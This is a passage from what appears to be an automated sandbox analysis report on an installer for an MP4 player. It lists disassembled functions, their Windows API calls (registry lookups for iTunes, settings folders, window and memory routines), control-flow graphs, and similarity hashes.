                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004C628A
                                                                                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004C629C
                                                                                                                                                                                                  • GlobalHandle.KERNEL32(007626E0), ref: 004C62B3
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004C62BA
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0049689D,?,?,0050B044,0050B044,004C65AF,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000), ref: 004C62C0
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004C62CF
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004C6318
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2667261700-0
                                                                                                                                                                                                  • Opcode ID: 413cfacae1f42b828034434364dd8bc2c24a0cefcd0f73d0b1ef7d73a0587937
                                                                                                                                                                                                  • Instruction ID: cf1a7b870f0e7d84935cadd3de424ab408148836a8ecbda0050e2075fff26837
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 413cfacae1f42b828034434364dd8bc2c24a0cefcd0f73d0b1ef7d73a0587937
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A431BC792003059FD760AF69DC89E2AB7E9FB44300B018A7EF892C3661E775F8048B54
                                                                                                                                                                                                  Function 0041B548 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 139 41b548-41b574 RegOpenKeyExW 140 41b5b4-41b5c0 RegCloseKey 139->140 141 41b576-41b587 RegOpenKeyExW 139->141 142 41b5c4-41b5c8 140->142 141->140 143 41b589-41b59f RegOpenKeyExW 141->143 143->140 144 41b5a1-41b5b2 RegOpenKeyExW 143->144 144->140 145 41b5c2 144->145 145->142
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B570
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B583
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B59B
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B5AE
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041B5B7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open$Close
                                                                                                                                                                                                  • String ID: Software\Apple Computer, Inc.\iTunes$Software\Apple, Inc.\iTunes
                                                                                                                                                                                                  • API String ID: 3083169812-2508981905
                                                                                                                                                                                                  • Opcode ID: b4c0b82fe578a96844b16a804d571b8e36904e14a481291f64605816a4a3084d
                                                                                                                                                                                                  • Instruction ID: 0bf58a548db8b678b3fdef80781bb253a552e90b61d530aea4e121a184306a76
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4c0b82fe578a96844b16a804d571b8e36904e14a481291f64605816a4a3084d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B101627160021DFEFB20C3929D45FFB7AADDB44B88F20003ABE04F5181D7A4AE4496B8
                                                                                                                                                                                                  Function 00403AAD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125windowCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00403AB2
                                                                                                                                                                                                    • Part of subcall function 00404245: __EH_prolog.LIBCMT ref: 0040424A
                                                                                                                                                                                                    • Part of subcall function 004011CF: LoadCursorW.USER32(?,00000191), ref: 004011F6
                                                                                                                                                                                                    • Part of subcall function 00401659: __EH_prolog.LIBCMT ref: 0040165E
                                                                                                                                                                                                    • Part of subcall function 00403FBA: __EH_prolog.LIBCMT ref: 00403FBF
                                                                                                                                                                                                    • Part of subcall function 004B57A7: ShowWindow.USER32(?,?,0040A5CD,00000000), ref: 004B57B5
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 00403BC0
                                                                                                                                                                                                    • Part of subcall function 004B54D9: DragAcceptFiles.SHELL32(?,?), ref: 004B54E0
                                                                                                                                                                                                  • PostMessageW.USER32(?,000057FC,00000000,00000000), ref: 00403BFE
                                                                                                                                                                                                  • PostMessageW.USER32(?,000057F2,00000000,00000001), ref: 00403C16
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$MessagePostWindow$AcceptCursorDragFilesLoadShowUpdate
                                                                                                                                                                                                  • String ID: Tomabo$`N
                                                                                                                                                                                                  • API String ID: 2519598137-2192252995
                                                                                                                                                                                                  • Opcode ID: e196036f6a4c967a6dd153ec47ffa0ccbb0917f413654e1d21e7365c827d2897
                                                                                                                                                                                                  • Instruction ID: 4e12a13fbca08d1458972ce396d1561db928aaf09fd47eff7d91b750cd480921
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e196036f6a4c967a6dd153ec47ffa0ccbb0917f413654e1d21e7365c827d2897
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441D334700644AFDB14FBA5DC51FAEBBA9AF54308F10407EB506A72C2DA7CAE058719
                                                                                                                                                                                                  Function 004C4C88 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 202 4c4c88-4c4cbe RegOpenKeyExW 203 4c4cfa-4c4d03 202->203 204 4c4cc0-4c4cdd RegCreateKeyExW 202->204 206 4c4d0a-4c4d0d 203->206 207 4c4d05-4c4d08 RegCloseKey 203->207 204->203 205 4c4cdf-4c4cf8 RegCreateKeyExW 204->205 205->203 208 4c4d0f-4c4d12 RegCloseKey 206->208 209 4c4d14-4c4d1b 206->209 207->206 208->209
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4CB6
                                                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CD9
                                                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CF8
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,00508FBC,AppFolder,00000000), ref: 004C4D08
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4D12
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreate$Open
                                                                                                                                                                                                  • String ID: software
                                                                                                                                                                                                  • API String ID: 1740278721-2010147023
                                                                                                                                                                                                  • Opcode ID: b6ee44f51cd3453057349a4c5538b36330712ed3234f2ffb3c0211161fe7654c
                                                                                                                                                                                                  • Instruction ID: 01cfaa8c328abbbb0188727767fc5933a758e1c0896283940e8cb0ec6d885571
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ee44f51cd3453057349a4c5538b36330712ed3234f2ffb3c0211161fe7654c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0311E676901158FBDB61DB9ACD88DEFFFBCEFC5704B1000AAA905A2121D3715A00DBA4
                                                                                                                                                                                                  Function 0041F164 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041F169
                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00509088,Settings), ref: 0041F19E
                                                                                                                                                                                                    • Part of subcall function 0041EF98: __EH_prolog.LIBCMT ref: 0041EF9D
                                                                                                                                                                                                    • Part of subcall function 0041EF98: GetModuleFileNameW.KERNEL32(?,00000000,000003FF,?,?,00508FBC), ref: 0041F00A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$FileFolderModuleNamePathSpecial
                                                                                                                                                                                                  • String ID: %s\%s\%s$MP4 Player$Settings$Tomabo
                                                                                                                                                                                                  • API String ID: 552222073-520340064
                                                                                                                                                                                                  • Opcode ID: afe5304a1a8606663fa0dff7bfd115714ad4f3548ae98419088cda19dfabae77
                                                                                                                                                                                                  • Instruction ID: 149e69f5aa4820c5b46e142cd9b29830a07ea0fa65eda547c9cec1cdaa9fb26b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: afe5304a1a8606663fa0dff7bfd115714ad4f3548ae98419088cda19dfabae77
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA11937194011CBACB00EF95DC41AEEBBB8FF14344F40447EF505A2181CB785A49CBA9
                                                                                                                                                                                                  Function 004B7489 Relevance: 9.0, APIs: 6, Instructions: 35COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004B7496
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004B749D
                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004B74B6
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 004B74C7
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B74CF
                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004B74D7
                                                                                                                                                                                                    • Part of subcall function 004C6003: GetSystemMetrics.USER32(00000002), ref: 004C6015
                                                                                                                                                                                                    • Part of subcall function 004C6003: GetSystemMetrics.USER32(00000003), ref: 004C601F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1031845853-0
                                                                                                                                                                                                  • Opcode ID: a7824fac2594c6d583719904e4f4600217739ce21e6b45daf7cec4986dc66ae9
                                                                                                                                                                                                  • Instruction ID: fbbfe9c0f7f0e0cba4edf02f00eb2defb6cef4ca40895e2c57ae65a168e5b4ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7824fac2594c6d583719904e4f4600217739ce21e6b45daf7cec4986dc66ae9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F05434640700AEE3606B739C89F577BA4EF90756F11482EF245562D0DBB898458FB5
                                                                                                                                                                                                  Function 004AF51F Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 289stringCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 233 4af51f-4af535 234 4af538-4af53c 233->234 235 4af542-4af546 234->235 236 4af827-4af854 call 4b236b call 49b09d call 4b23bb 234->236 238 4af54c-4af558 235->238 239 4af81d 235->239 238->239 242 4af55e-4af566 238->242 240 4af820-4af822 239->240 240->234 244 4af568-4af56c 242->244 245 4af5b0-4af5b7 call 49812d 242->245 248 4af56e-4af571 244->248 249 4af573-4af577 244->249 255 4af5ba-4af5c0 245->255 252 4af5a0-4af5a9 248->252 253 4af588-4af58c 249->253 254 4af579-4af586 249->254 252->244 258 4af5ab-4af5ae 252->258 253->252 257 4af58e-4af592 253->257 254->252 259 4af5d1-4af5d7 255->259 260 4af5c2-4af5cb call 497e0d 255->260 257->252 261 4af594-4af598 257->261 258->245 258->259 263 4af5d9-4af5df 259->263 264 4af5ed-4af603 call 49b17a 259->264 260->259 271 4af5cd-4af5cf 260->271 261->252 265 4af59a-4af59e 261->265 267 4af611-4af618 call 49812d 263->267 268 4af5e1-4af5ea 263->268 274 4af631-4af637 264->274 275 4af605-4af60f 264->275 265->252 265->258 276 4af61a-4af620 267->276 268->264 271->255 277 4af639-4af63c 274->277 278 4af65c-4af65d 274->278 279 4af65e-4af66b 275->279 276->264 282 4af622-4af62b call 497e0d 276->282 277->278 283 4af63e-4af640 277->283 278->279 280 4af708-4af70d 279->280 281 4af671 279->281 286 4af70f-4af714 280->286 287 4af745-4af751 280->287 284 4af73c-4af743 281->284 285 4af677-4af67a 281->285 282->264 303 4af62d-4af62f 282->303 283->278 289 4af642-4af645 283->289 295 4af771-4af773 284->295 285->284 290 4af680-4af685 285->290 286->284 291 4af716-4af719 286->291 296 4af758-4af759 lstrlenA 287->296 297 4af753-4af756 287->297 293 4af647-4af64a 289->293 294 4af655 289->294 290->287 298 4af68b-4af68d 290->298 301 4af71b-4af71e 291->301 302 4af725-4af731 291->302 293->279 304 4af64c-4af653 293->304 294->278 299 4af77b-4af77e 295->299 300 4af775-4af777 295->300 305 4af75f-4af764 296->305 297->295 298->284 308 4af693-4af695 298->308 310 4af818-4af81b 299->310 311 4af784-4af787 299->311 300->299 309 4af779 300->309 301->284 312 4af720-4af723 301->312 302->297 313 4af733-4af73a call 496f94 302->313 303->276 304->278 306 4af769-4af76b 305->306 307 4af766-4af768 305->307 306->295 314 4af6aa-4af6b0 306->314 307->306 315 4af6f1-4af6fd 308->315 316 4af697-4af69c 308->316 309->299 310->240 311->310 312->302 312->314 313->305 320 4af7dd-4af7e0 314->320 321 4af6b6 314->321 315->297 318 4af6ff-4af706 lstrlenW 315->318 316->284 319 4af6a2-4af6a4 316->319 318->305 319->287 319->314 323 4af7e2-4af7e3 320->323 324 4af814 320->324 325 4af808-4af80c 321->325 326 4af6bc-4af6bf 321->326 323->325 327 4af7e5-4af7e6 323->327 324->310 330 4af80e-4af812 325->330 331 4af7f4 325->331 328 4af7d2-4af7db 326->328 329 4af6c5-4af6c8 326->329 327->331 333 4af7e8-4af7eb 327->333 332 4af7fb-4af802 328->332 329->325 335 4af6ce-4af6d1 329->335 334 4af7f8-4af7fa 330->334 331->334 332->310 337 4af804-4af806 332->337 333->325 336 4af7ed-4af7f0 333->336 334->332 335->325 338 4af6d7-4af6d8 335->338 336->325 339 4af7f2 336->339 337->310 338->328 340 4af6de-4af6df 338->340 339->310 341 4af78c-4af795 340->341 342 4af6e5-4af6e6 340->342 343 4af79a-4af7d0 call 496fc0 call 49b10b call 496f94 341->343 344 4af797 341->344 342->328 345 4af6ec 342->345 343->337 344->343 345->310
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,%d.%d,?,00508FBC,00508FBC), ref: 004AF700
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,%d.%d,?,00508FBC,00508FBC), ref: 004AF759
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: %*.*f$%d.%d$I64
                                                                                                                                                                                                  • API String ID: 1659193697-4138610494
                                                                                                                                                                                                  • Opcode ID: 7b0b7e420e22e9f47ca79297d0adeea6d7a0140055b3eddb28af148e4e04f3c1
                                                                                                                                                                                                  • Instruction ID: e57e6afcf036b60d09cb009b0a4bda74ef2f73d766fb5af7e0f192a24310846b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b0b7e420e22e9f47ca79297d0adeea6d7a0140055b3eddb28af148e4e04f3c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C691097A800206ABDF24AEE8C4487AE77A0EB33314F54813BE84197355D73C9E4ACB5D
                                                                                                                                                                                                  Function 004C4DCE Relevance: 7.6, APIs: 5, Instructions: 91registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C4DD3
                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4E2A
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,?,?,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4E50
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4E61
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,00001000,?), ref: 004C4EBB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: QueryValue$CloseH_prologPrivateProfileString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1022837590-0
                                                                                                                                                                                                  • Opcode ID: 890f54c9963bd3f36bdfd8edf906818878f132c89c75a713ade90e1da8b9f0c8
                                                                                                                                                                                                  • Instruction ID: 602de37e93798daf2c5f2aebe3330b7f213d59b461b9d5859f77aaac0edc770f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 890f54c9963bd3f36bdfd8edf906818878f132c89c75a713ade90e1da8b9f0c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0231963180010AEBCF01EFA1DD54EEE7BB9FF84354F10452EF825A21A0DB389A11CB64
                                                                                                                                                                                                  Function 004B60C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27threadCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 387 4b60c0-4b60c9 call 4c4b7d 390 4b60cb-4b60f6 call 4c4950 GetCurrentThreadId SetWindowsHookExW call 4c663d 387->390 391 4b611e 387->391 395 4b60fb-4b6101 390->395 396 4b610e-4b611d call 4c657b 395->396 397 4b6103-4b6108 call 4c4b7d 395->397 396->391 397->396
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004B60D3
